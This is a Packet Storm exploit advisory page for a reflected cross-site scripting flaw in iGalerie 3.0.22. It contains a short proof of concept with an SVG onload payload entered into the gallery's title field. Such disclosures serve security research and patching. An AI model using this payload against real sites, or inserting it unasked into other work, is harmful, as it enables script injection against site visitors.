iGalerie 3.0.22 Cross Site Scripting ≈ Packet Storm

iGalerie 3.0.22 Cross Site Scripting ≈ Packet Storm

Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]

iGalerie 3.0.22 Cross Site Scripting[6]
Authored by tmrswrr[7]

iGalerie version 3.0.22 suffers from a cross site scripting vulnerability.

SHA-256 | 1ab0c986c1a7f7b7980237b1617e0e2e1f36299cac4926ea221dcc4d6457f99b

Change Mirror[11] Download[12]

        # Exploit Title: iGalerie Version: 3.0.22 - Reflected XSS 
# Date: 2024-7-1
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.igalerie.org/
# Version: 3.0.22
# Tested on: https://softaculous.com/demos/iGalerie
1 ) Go to home page and click edit > https://127.0.0.1/iGalerie/
Titre : "><sVg/onLy=1 onLoaD=confirm(1)//
2 ) Write in titre your payload , after save will be see alert button.

Login[13] or Register[14] to add favorites

File Archive:

January 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa

File Tags

File Archives

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services[119]
Hosting By
Rokasec[120]
close
Image

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.

 

"No secure path in the world"